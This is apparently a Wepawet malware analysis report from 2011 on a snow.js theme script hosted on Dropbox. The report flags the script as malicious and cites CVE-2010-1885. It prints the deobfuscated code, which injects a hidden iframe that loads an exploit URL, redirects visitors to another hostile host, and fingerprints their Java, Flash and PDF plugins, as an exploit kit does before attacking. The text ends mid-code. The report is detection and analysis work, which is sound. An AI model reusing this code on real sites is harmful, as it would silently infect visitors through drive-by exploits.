Wepawet

Analysis report for http://dl.dropbox.com/u/50989988/js/theme/snow.js

Sample Overview¶

URL	http://dl.dropbox.com/u/50989988/js/theme/snow.js
Domain	dl.dropbox.com
Analysis Started	2011-12-05 12:07:48
Report Generated	2011-12-05 12:08:21
Jsand version	2.3.1

See the report for domain dl.dropbox.com.

Detection results¶

Detector	Result
Jsand 2.3.1	malicious

In particular, the following URL was found to contain malicious content:

http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802

Exploits¶

Name	Description	Reference
HPC URL	Help Center URL Validation Vulnerability	CVE-2010-1885

Deobfuscation results¶

Evals

if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("
<iframe src='http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802' width='10'
 height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 
  'http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

(repeated 1 time)

document.write('<center><h1>Please wait page is loading...</h1></center><hr>');
function end_redirect(){
  window.location.href = 
  'http://pokler1.thailandclubinfo.com//index.php?7e0071740f50250645dcbdc868cb799b';
}
var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0];
try {
  var PluginDetect = {
    handler : function (c, b, a){
      return function (){
        c(b, a)
      }
    }
    , isDefined : function (b){
      return typeof b != "undefined"
    }
    , isArray : function (b){
      return (/array/i).test(Object.prototype.toString.call(b))
    }
    , isFunc : function (b){
      return typeof b == "function"
    }
    , isString : function (b){
      return typeof b == "string"
    }
    , isNum : function (b){
      return typeof b == "number"
    }
    , isStrNum : function (b){
      return (typeof b == "string" && (/\d/).test(b))
    }
    , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ]
/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumR
egx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parse
Int;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNum
s(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.l
ength);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}retur
n 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c))
{c=4}c--;e=b.replace(/ \ s
    /g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/ ^ (0 + 
    )(. + )$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/ \ d
/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return f
unction(d){if(!a.isIE&&d){var c,b,e,f=a.isString(d)?[d]:d;if(!f||!f.length){return null}fo
r(e=0;e<f.length;e++){if(/[ ^\ s]
/.test(f[e])&&(c=navigator.mimeTypes[f[e]])&&(b=c.enabledPlugin)&&(b.name||b.description))
{return c}}}return null}},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(
!j.isDefined(e)||e)?/ \ d
/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].
description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightCo
ntext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.te
st(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(a,f){var e=thi
s,b,c=new RegExp(f,"i"),d="";if((b=e.hasMimeType(a))&&(b=b.enabledPlugin)&&(c.test(b.descr
iption||d)||c.test(b.name||d))){return b}return 0},getPluginFileVersion:function(f,b){var 
h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){r
eturn e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRe
gx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a
}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(b){var f=null
,d,c=this,a;try{f=new c.AXO(b)}catch(d){}return f},convertFuncs:function(g){var a,h,f,b=/ ^ 
    [$][$]
/,d={},c=this;for(a in g){if(b.test(a)){d[a]=1}}for(a in d){try{h=a.slice(2);if(h.length>0
&&!g[h]){g[h]=g[a](g);delete g[a]}}catch(f){}}},initScript:function(){var c=this,a=navigat
or,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"
    ";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod
    ",21.2,"iPad",21.3,"Win. * CE",22.1,"Win. * Mobile",22.2,"Pocket \ s * PC",22.3,"
    ",100];for(f=d.length-2;f>=0;f=f-2){if(d[f]&&new RegExp(d[f],"i
    ").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.isIE=new Function("return "+e+" * 
    @cc_on!@ * "+e+"false"
)();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.Active
XEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM
    ","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.
    Dictionary","wmplayer.ocx"
];for(f=0;f<j.length;f++){if(c.getAXO(j[f])){c.ActiveXEnabled=true;break}}c.head=c.isDefin
ed(document.getElementsByTagName)?document.getElementsByTagName("head"
)[0]:null}c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);c.verGecko=c.isGecko?
c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"
):null;c.isSafari=(/Safari\s*\/\s*\d/i).test(i)&&(/Apple/i).test(g);c.isChrome=(/Chrome\s*
\/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isOpera=(
/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*
)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load"
,c.handler(c.runWLfuncs,c))},init:function(c){var b=this,a,c;if(!b.isString(c)){return -3}
if(c.length==1){b.getVersionDelimiter=c;return -3}c=c.toLowerCase().replace(/\s/g,""
);a=b[c];if(!a||!a.getVersion){return -3}b.plugin=a;if(!b.isDefined(a.installed)){a.instal
led=a.version=a.version0=a.getVersionDone=null;a.$=b;a.pluginName=c}b.garbage=false;if(b.i
sIE&&!b.ActiveXEnabled){if(a!==b.java){return -2}}return 1},fPush:function(b,a){var c=this
;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)}},c
allArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a<b.length;a++){if(b[a]===null)
{return}c.call(b[a]);b[a]=null}}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;i
f(a>0&&b['isFunc'](c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c(
b)}}},getVersionDelimiter:", "
,$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h;if(e<0){return null
};f=a.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f.
getVersionDone=1}}a.cleanup();b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.get
VersionDelimiter):b;return b}},cleanup:	function(){var a=this;if(a.garbage&&a.isDefined(wi
ndow.CollectGarbage)){window.CollectGarbage()}},addWinEvent:function(d,c){var e=this,a=win
dow,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(a.attac
hEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on
    "+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function(){d();if(typeof c=="
    function "
){c()}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){a.winLoaded=true;a.callArray(a.WLfu
ncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()}},winLoaded:false,$$o
nWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPush(b,a.WL
funcs)}}},$$onDetectionDone:function(a){return function(h,g,c,b){var d=a.init(h),j,e;if(d=
=-3){return -1}e=a.plugin;if(!a.isArray(e.funcs)){e.funcs=[]}if(e.getVersionDone!=1){j=a.i
sMinVersion?a.isMinVersion(h,"0"
,c,b):a.getVersion(h,c,b)}if(e.installed!=-0.5&&e.installed!=0.5){a.call(g);return 1}if(e.
NOTF){a.fPush(g,e.funcs);return 0}return 1}},div:null,divWidth:50,pluginSize:1,emptyDiv:fu
nction(){var c=this,a,e,b,d=0;if(c.div&&c.div.childNodes){for(a=c.div.childNodes.length-1;
a>=0;a--){b=c.div.childNodes[a];if(b&&b.childNodes){if(d==0){for(e=b.childNodes.length-1;e
>=0;e--){b.removeChild(b.childNodes[e])}c.div.removeChild(b)}else{}}}}},DONEfuncs:[],onDon
eEmptyDiv:function(){var c=this,a,b;if(!c.winLoaded){return}if(c.WLfuncs&&c.WLfuncs.length
&&c.WLfuncs[c.WLfuncs.length-1]!==null){return}for(a in c){b=c[a];if(b&&b.funcs){if(b.OTF=
=3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return}}}for(a=0;a<c.DONEf
uncs.length;a++){c.callArray(c.DONEfuncs)}c.emptyDiv()},getWidth:function(c){if(c){var a=c
.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return a}}return -1},getTagStatus:functi
on(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.ge
tWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return -2}if(j<i||l<0||j<0||i<0||!(i>c.pluginSiz
e)||c.pluginSize<1){return 0}if(l>=i){return -1}try{if(l==c.pluginSize&&(!c.isIE||c.getDOM
obj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1}if(m.winLoaded&&c.isNum(b)){
if(!c.isNum(m.count)){m.count=b}if(b-m.count>=10){return 1}}}}catch(f){}return 0},getDOMob
j:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;try{if(b&&a){c.firstChild.
focus()}}catch(f){}return b?c.firstChild:null},setStyle:function(b,g){var f=b.style,a,d,c=
this;if(f&&g){for(a=0;a<g.length;a=a+2){try{f[g[a]]=g[a+1]}catch(d){}}}},insertDivInBody:f
unction(i){var g,d=this,h="pd33993399",c=null,f=document,b=" < 
    ",a=(f.getElementsByTagName("body")[0]||f.body);if(!a){try{f.write(b+'div id="'+h+'
    ">o'+b+"
/div>");c=f.getElementById(h)}catch(g){}}a=(f.getElementsByTagName("body")[0]||f.body);if(
a){if(a.firstChild&&d.isDefined(a.insertBefore)){a.insertBefore(i,a.firstChild)}else{a.app
endChild(i)}if(c){a.removeChild(c)}}else{}},insertHTML:function(g,b,h,a,k){var l,m=documen
t,j=this,q,o=m.createElement("span"),n,i,f="<";var c=["outlineStyle","none","borderStyle",
"none","padding","0px","margin","0px","visibility","visible"];if(!j.isDefined(a)){a=""}if(
j.isString(g)&&(/[ ^\ s]
/).test(g)){q=f+g+' width="'+j.pluginSize+'" height="'+j.pluginSize+'" ';for(n=0;n<b.lengt
h;n=n+2){if(/[ ^\ s]
    /.test(b[n+1])){q+=b[n]+'="'+b[n+1]+'" '}}q+=">";for(n=0;n<h.length;n=n+2){if(/[ ^\ s]
    /.test(h[n+1])){q+=f+'param name="'+h[n]+'" value="'+h[n+1]+'" / > '
}}q+=a+f+"/"+g+">"}else{q=a}if(!j.div){j.div=m.createElement("div");i=m.getElementById("pl
ugindetect");if(i){j.div=i}else{j.div.id="plugindetect";j.insertDivInBody(j.div)}j.setStyl
e(j.div,c.concat(["width",j.divWidth+"px","height",(j.pluginSize+3)+"px","fontSize",(j.plu
ginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","b
lock"]));if(!i){j.setStyle(j.div,["position","absolute","right","0px","top","0px"])}}if(j.
div&&j.div.parentNode){j.div.appendChild(o);j.setStyle(o,c.concat(["fontSize",(j.pluginSiz
e+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","inline"
]));try{if(o&&o.parentNode){o.focus()}}catch(l){}try{o.innerHTML=q}catch(l){}if(o.childNod
es.length==1&&(j.isGecko&&j.compareNums(j.verGecko,"1"+",5,0,0")>=0)){j.setStyle(o.firstCh
ild,c.concat(["display","inline"]))}return{span:o,winLoaded:j.winLoaded,tagName:(j.isStrin
g(g)?g:"")}}return{span:null,winLoaded:j.winLoaded,tagName:""}},java:{mimeType:["applicati
on/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeTypeJPI:"applicat
ion/x-java-applet;jpi-version=",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",DTKcl
assID:"clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",DTKmimeType:["application/java-deployme
nt-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],forceVerifyTag:[]
,jar:[],Enabled:navigator.javaEnabled(),VENDORS:["Sun Microsystems Inc.","Apple Computer, 
Inc."],OTF:null,All_versions:[],mimeTypeJPIresult:"",JavaPlugin_versions:[],JavaVersions:[
[1,9,2,30],[1,8,2,30],[1,7,2,30],[1,6,1,30],[1,5,1,30],[1,4,2,30],[1,3,1,30]],searchJavaPl
uginAXO:function(){var h=null,a=this,c=a.$,g=[],j=[1,5,0,14],i=[1,6,0,2],f=[1,3,1,0],e=[1,
4,2,0],d=[1,5,0,7],b=false;if(!c.ActiveXEnabled){return null};if(c.verIE>=a.minIEver){g=a.
searchJavaAXO(i,i,b);if(g.length>0&&b){g=a.searchJavaAXO(j,j,b)}}else{if(g.length==0){g=a.
searchJavaAXO(f,e,false)}}if(g.length>0){h=g[0]}a.JavaPlugin_versions=[].concat(g);return 
h},searchJavaAXO:function(l,i,m){var n,f,h=this.$,q,k,a,e,g,j,b,r=[];if(h.compareNums(l.jo
in(","),i.join(","))>0){i=l}i=h.formatNum(i.join(","));var o,d="1,4,2,0",c="JavaPlugin."+l
[0]+""+l[1]+""+l[2]+""+(l[3]>0?("_"+(l[3]<10?"0":"")+l[3]):"");for(n=0;n<this.JavaVersions
.length;n++){f=this.JavaVersions[n];q="JavaPlugin."+f[0]+""+f[1];g=f[0]+"."+f[1]+".";for(a
=f[2];a>=0;a--){b="JavaWebStart.isInstalled."+g+a+".0";if(h.compareNums(f[0]+","+f[1]+","+
a+",0",i)>=0&&!h.getAXO(b)){continue}o=h.compareNums(f[0]+","+f[1]+","+a+",0",d)<0?true:fa
lse;for(e=f[3];e>=0;e--){k=a+"_"+(e<10?"0"+e:e);j=q+k;if(h.getAXO(j)&&(o||h.getAXO(b))){r.
push(g+k);if(!m){return r}}if(j==c){return r}}if(h.getAXO(q+a)&&(o||h.getAXO(b))){r.push(g
+a);if(!m){return r}}if(q+a==c){return r}}}return r},minIEver:7,getMimeJPIversion:function
(){var h,a=this,d=a.$,c=new RegExp("("+a.mimeTypeJPI+")(\d.*)","i"),k=new RegExp("Java","i
"),e,j,f="",i={},g=0,b;for(h=0;h<navigator.mimeTypes.length;h++){j=navigator.mimeTypes[h];
if(c.test(j.type)&&(e=j.enabledPlugin)&&(j=RegExp.$2)&&(k.test(e.description||f)||k.test(e
.name||f))){i["a"+d.formatNum(j)]=j}}b="0,0,0,0";for(h in i){g++;e=h.slice(1);if(d.compare
Nums(e,b)>0){b=e}}a.mimeTypeJPIresult=g>0?a.mimeTypeJPI+i["a"+b]:"";return g>0?b:null},get
Version:function(m,d,l){var f,c=this,e=c.$,h=c.NOTF,b=c.applet,j=c.verify,i=vendor=version
Enabled=null;if(c.getVersionDone===null){c.OTF=0;c.mimeObj=e.hasMimeType(c.mimeType);c.dep
loyTK.$=e;c.deployTK.parentNode=c;b.$=e;b.parentNode=c;if(h){h.$=e;h.parentNode=c}if(j){j.
parentNode=c;j.$=e;j.init()}}var k;if(e.isArray(l)){for(k=0;k<b.allowed.length;k++){if(e.i
sNum(l[k])){b.allowed[k]=l[k]}}}for(k=0;k<c.forceVerifyTag.length;k++){b.allowed[k]=c.forc
eVerifyTag[k]}if(e.isString(d)){c.jar.push(d)}if(c.getVersionDone==0){if(!c.version||b.can
TryAny()){f=b.insertHTMLQueryAll(d);if(f[0]){c.installed=1;c.EndGetVersion(f[0],f[1])}}ret
urn}var g=c.deployTK.query();if(g.JRE){i=g.JRE;vendor=c.VENDORS[0]}if(!e.isIE){var q,n,a,o
;o=(c.mimeObj&&c.Enabled)?true:false;if(!i&&(f=c.getMimeJPIversion())!==null){i=f}if(!i&&c
.mimeObj){f="Java[^\d]*Plug-in";a=e.findNavPlugin(f);if(a){f=new RegExp(f,"i");q=f.test(a.
description||"")?e.getNum(a.description):null;n=f.test(a.name||"")?e.getNum(a.name):null;i
f(q&&n){i=(e.compareNums(e.formatNum(q),e.formatNum(n))>=0)?q:n}else{i=q||n}}}if(!i&&c.mim
eObj&&e.isSafari&&e.OS==2){a=e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa",0);if(a){q=e.getNu
m(a.description);if(q){i=q}}}if(i){c.version0=i;if(c.Enabled){versionEnabled=i}}}else{if(!
i&&g.status==0){i=c.searchJavaPluginAXO();if(i){vendor=c.VENDORS[0]}}if(i){c.version0=i;if
(c.Enabled&&e.ActiveXEnabled){versionEnabled=i}}}if(!versionEnabled||b.canTryAny()){f=b.in
sertHTMLQueryAll(d);if(f[0]){versionEnabled=f[0];vendor=f[1]}}if(!versionEnabled&&(f=c.que
ryWithoutApplets())[0]){c.version0=versionEnabled=f[0];vendor=f[1];if(c.installed==-0.5){c
.installed=0.5}}if(e.isSafari&&e.OS==2){if(!versionEnabled&&o){if(c.installed===null){c.in
stalled=0}else{if(c.installed==-0.5){c.installed=0.5}}}}if(c.jreDisabled()){versionEnabled
=null};if(c.installed===null){c.installed=versionEnabled?1:(i?-0.2:-1)}c.EndGetVersion(ver
sionEnabled,vendor)},EndGetVersion:function(b,d){var a=this,c=a.$;if(a.version0){a.version
0=c.formatNum(c.getNum(a.version0))}if(b){a.version=c.formatNum(c.getNum(b));a.vendor=(c.i
sString(d)?d:"")}if(a.getVersionDone!=1){a.getVersionDone=0}},jreDisabled:function(){var b
=this,d=b.$,c=b.deployTK.query().JRE,a;if(c&&d.OS==1){if((d.isGecko&&d.compareNums(d.verGe
cko,"1,9,2,0")>=0&&d.compareNums(c,"1,6,0,12")<0)||(d.isChrome&&d.compareNums(c,"1,6,0,12"
)<0)){return 1}};if(d.isOpera&&d.verOpera>=9&&!b.Enabled&&!b.mimeObj&&!b.queryWithoutApple
ts()[0]){return 1}if((d.isGecko||d.isChrome)&&!b.mimeObj&&!b.queryWithoutApplets()[0]){ret
urn 1}return 0},deployTK:{status:null,JREall:[],JRE:null,HTML:null,query:function(){var f=
this,h=f.$,c=f.parentNode,i,a,b,g=len=null;if(f.status!==null){return f}f.status=0;if(!(h.
isGecko&&h.compareNums(h.verGecko,h.formatNum("1.6"))>=1)||h.isSafari||h.isChrome||(h.isIE
&&!h.ActiveXEnabled)){return f}if(h.isIE&&h.verIE>=6){f.HTML=h.insertHTML("object",[],[]);
g=h.getDOMobj(f.HTML)}else{if(!h.isIE&&(b=h.hasMimeType(c.DTKmimeType))&&b.type){f.HTML=h.
insertHTML("object",["type",b.type],[]);g=h.getDOMobj(f.HTML)}}if(g){if(h.isIE&&h.verIE>=6
){try{g.classid=c.DTKclassID}catch(i){}};try{var d=g.jvms;if(d){len=d.getLength();if(h.isN
um(len)){f.status=len>0?1:-1;for(a=0;a<len;a++){b=h.getNum(d.get(len-1-a).version);if(b){f
.JREall[a]=b}}}}}catch(i){}}if(f.JREall.length>0){f.JRE=h.formatNum(f.JREall[0])}return f}
},queryWithoutApplets00:function(c,a){var b=window.java,d;try{if(b&&b.lang&&b.lang.System)
{a.value=[b.lang.System.getProperty("java.version")+" ",b.lang.System.getProperty("java.ve
ndor")+" "]}}catch(d){}},queryWithoutApplets:function(){var c=this,f=c.$,g,a=c.queryWithou
tApplets;if(!a.value){a.value=[null,null];if(!f.isIE&&window.java){if(f.OS==2&&f.isOpera&&
(f.verOpera<9.2)&&f.verOpera>=9){}else{if(f.isGecko&&f.compareNums(f.verGecko,"1,9,0,0")<0
&&f.compareNums(f.verGecko,"1,8,0,0")>=0){}else{if(f.isGecko){var i,b,h=document;if(h.crea
teElement&&h.createEvent){try{i=h.createElement("div"),b=h.createEvent("HTMLEvents");b.ini
tEvent("change",false,false);i.addEventListener("change",f.handler(c.queryWithoutApplets00
,f,a),false);i.dispatchEvent(b)}catch(g){}}}else{c.queryWithoutApplets00(f,a)}}}}}return a
.value},applet:{results:[[null,null],[null,null],[null,null]],HTML:[0,0,0],active:[0,0,0],
allowed:[2,2,2],DummyObjTagHTML:0,DummySpanTagHTML:0,getResult:function(){var c=this.resul
ts,a,b;for(a=0;a<c.length;a++){b=c[a];if(b[0]){break}}return[].concat(b)},canTry:function(
d){var b=this,c=b.$,a=b.parentNode;if(b.allowed[d]==3){return true}if(!a.version0||!a.Enab
led||(c.isIE&&!c.ActiveXEnabled)){if(b.allowed[d]==2){return true}if(b.allowed[d]==1&&!b.g
etResult()[0]){return true}}return false},canTryAny:function(){var b=this,a;for(a=0;a<b.al
lowed.length;a++){if(b.canTry(a)){return true}}return false},canUseAppletTag:function(){va
r b=this,c=b.$,a=b.parentNode;return(!c.isIE||a.Enabled)},canUseObjectTag:function(){var a
=this,b=a.$;return(!b.isIE||b.ActiveXEnabled)},queryThis:function(h){var g,c=this,b=c.pare
ntNode,f=b.$,a=vendor=null,d=f.getDOMobj(c.HTML[h],true);if(d){try{a=d.getVersion()+" ";ve
ndor=d.getVendor()+" ";d.statusbar(f.winLoaded?" ":" ")}catch(g){}if(f.isStrNum(a)){c.resu
lts[h]=[a,vendor]}try{if(f.isIE&&a&&d.readyState!=4){f.garbage=true;d.parentNode.removeChi
ld(d)}}catch(g){}}},insertHTMLQueryAll:function(e){var g=this,n=g.parentNode,d=n.$,o=g.res
ults,q=g.HTML,h="&nbsp;&nbsp;&nbsp;&nbsp;",u="A.class";if(!d.isString(e)||!(/\.jar\s*$/).t
est(e)||(/\\/).test(e)){return[null,null]}if(n.OTF<1){n.OTF=1}if(n.jreDisabled()){return[n
ull,null]}if(n.OTF<2){n.OTF=2}var c=e,t="",m;if((/[\/]/).test(e)){m=e.split("/");c=m[m.len
gth-1];m[m.length-1]="";t=m.join("/")}var j=["archive",c,"code",u],l=["mayscript","true"],
r=["scriptable","true"].concat(l),f=!d.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:n.mi
meType[0];if(!q[0]&&g.canUseObjectTag()&&g.canTry(0)){q[0]=d.isIE?d.insertHTML("object",["
type",f].concat(j),["codebase",t].concat(j).concat(r),h,n):d.insertHTML("object",["type",f
,"archive",c,"classid","java:"+u],["codebase",t,"archive",c].concat(r),h,n);o[0]=[0,0];g.q
ueryThis(0)}if(!q[1]&&g.canUseAppletTag()&&g.canTry(1)){q[1]=d.isIE?d.insertHTML("applet",
["alt",h].concat(l).concat(j),["codebase",t].concat(l),h,n):d.insertHTML("applet",["codeba
se",t,"alt",h].concat(l).concat(j),[].concat(l),h,n);o[1]=[0,0];g.queryThis(1)}if(!q[2]&&g
.canUseObjectTag()&&g.canTry(2)){q[2]=d.isIE?d.insertHTML("object",["classid",n.classID],[
"codebase",t].concat(j).concat(r),h,n):d.insertHTML();o[2]=[0,0];g.queryThis(2)}if(!g.Dumm
yObjTagHTML&&g.canUseObjectTag()){g.DummyObjTagHTML=d.insertHTML("object",[],[],h)}if(!g.D
ummySpanTagHTML){g.DummySpanTagHTML=d.insertHTML("",[],[],h)};if(n.OTF<=2&&((q[0]&&!o[0][0
])||(q[1]&&!o[1][0])||(d.isIE&&q[2]&&!o[2][0]))){var i=n.NOTF,b=i.isJavaActive();if(b>=0){
n.OTF=3;n.installed=b==1?0.5:-0.5;i.onIntervalQuery=d.handler(i.$$onIntervalQuery,i);if(!d
.winLoaded){d.WLfuncs0.push([i.winOnLoadQuery,i])}setTimeout(i.onIntervalQuery,i.intervalL
ength)}};var k,a=0;for(k=0;k<o.length;k++){if(q[k]||g.canTry(k)){a++}else{break}}if(a==o.l
ength){n.getVersionDone=n.forceVerifyTag.length>0?0:1}return g.getResult()}},NOTF:{count:0
,countMax:25,intervalLength:250,isJavaActive:function(){var e=this,c=e.parentNode,a,b,d=-9
;for(a=0;a<c.applet.HTML.length;a++){b=e.isAppletActive(a);c.applet.active[a]=b;if(b>d){d=
b}}return d},isAppletActive:function(g){var h=this,d=h.$,c=h.parentNode,b=c.applet,f,a=d.g
etTagStatus(b.HTML[g],b.DummySpanTagHTML,b.DummyObjTagHTML,h.count);if(a==-2){return -2}tr
y{if(d.isIE&&d.verIE>=c.minIEver&&d.getDOMobj(b.HTML[g]).object){return 1}}catch(f){}if(a=
=1&&(d.isIE||((c.version0&&c.Enabled&&c.Enabled)||c.queryWithoutApplets()[0]))){return 1}i
f(a<0){return -1}return 0},winOnLoadQuery:function(c,d){var b=d.parentNode,a;if(b.OTF==3){
a=d.queryAllApplets();d.queryCompleted(a[1],a[2])}},$$onIntervalQuery:function(d){var c=d.
$,b=d.parentNode,a;if(b.OTF==3){a=d.queryAllApplets();if(a[0]||(c.winLoaded&&d.count>d.cou
ntMax)){d.queryCompleted(a[1],a[2])}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d
.intervalLength)}},queryAllApplets:function(){var g=this,f=g.$,e=g.parentNode,d=e.applet,b
,a,c;for(b=0;b<d.results.length;b++){d.queryThis(b)}a=d.getResult();c=(a[0]||g.isJavaActiv
e()<0)?true:false;return[c,a[0],a[1]]},queryCompleted:function(c,f){var e=this,d=e.$,b=e.p
arentNode;if(b.OTF==4){return}b.OTF=4;var a=e.isJavaActive()==1?true:false;if(c||b.queryWi
thoutApplets()[0]){b.installed=1}else{if(a){if(b.version0){b.installed=1;c=b.version0}else
{b.installed=0}}else{if(b.installed==0.5){b.installed=0}else{if(b.version0){b.installed=-0
.2}else{b.installed=-1}}}}b.EndGetVersion(c,f);if(b.funcs){d.callArray(b.funcs)}if(d.onDon
eEmptyDiv){d.onDoneEmptyDiv()}}},append:function(e,d){for(var c=0;c<d.length;c++){e.push(d
[c])}},JavaFix:function(){}},flash:{mimeType:["application/x-shockwave-flash","application
/futuresplash"],progID:"ShockwaveFlash.ShockwaveFlash",classID:"clsid:D27CDB6E-AE6D-11CF-9
6B8-444553540000",getVersion:function(){var b=function(i){if(!i){return null}var e=/[\d][\
d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(i);return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,
""):null};var d,h=this,f=h.$,j,g,k=null,c=null,a=null;if(!f.isIE){d=f.findNavPlugin("Flash
");if(d&&d.description&&f.hasMimeType(h.mimeType)){k=b(d.description)}if(k){k=f.getPluginF
ileVersion(d,k)}}else{for(g=15;g>2;g--){c=f.getAXO(h.progID+"."+g);if(c){a=g.toString();br
eak}}if(a=="6"){try{c.AllowScriptAccess="always"}catch(j){return"6,0,21,0"}}try{k=b(c.GetV
ariable(""))}catch(j){}if(!k&&a){k=a}}h.installed=k?1:-1;h.version=f.formatNum(k);return t
rue}},adobereader:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF
.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMime
Type:function(d,c,f){var b=this,e=b.$,a;for(a in d){if(d[a]&&d[a].type&&d[a].type==c){retu
rn 1}}if(e.getMimeEnabledPlugin(c,f)){return 1}return 0},getVersion:function(i,j){var f=th
is,c=f.$,h,d,k,m=p=null,g=null,l=null,a,b;j=(c.isString(j)&&j.length)?j.replace(/\s/,"").t
oLowerCase():f.mimeType;if(c.isDefined(f.INSTALLED[j])){f.installed=f.INSTALLED[j];return}
if(!c.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(f
.getVersionDone!==0){f.getVersionDone=0;p=c.getMimeEnabledPlugin(f.mimeType,a);if(!p&&c.ha
sMimeType(f.mimeType)){p=c.findNavPlugin(a,0)}if(p){f.navPluginObj=p;g=c.getNum(p.descript
ion)||c.getNum(p.name);g=c.getPluginFileVersion(p,g);if(!g&&c.OS==1){if(f.pluginHasMimeTyp
e(p,"application/vnd.adobe.pdfxml",a)){g="9"}else{if(f.pluginHasMimeType(p,"application/vn
d.adobe.x-mars",a)){g="8"}}}}}else{g=f.version}m=c.getMimeEnabledPlugin(j,a);f.installed=m
&&g?1:(m?0:(f.navPluginObj?-0.2:-1))}else{p=c.getAXO(f.progID[0])||c.getAXO(f.progID[1]);b
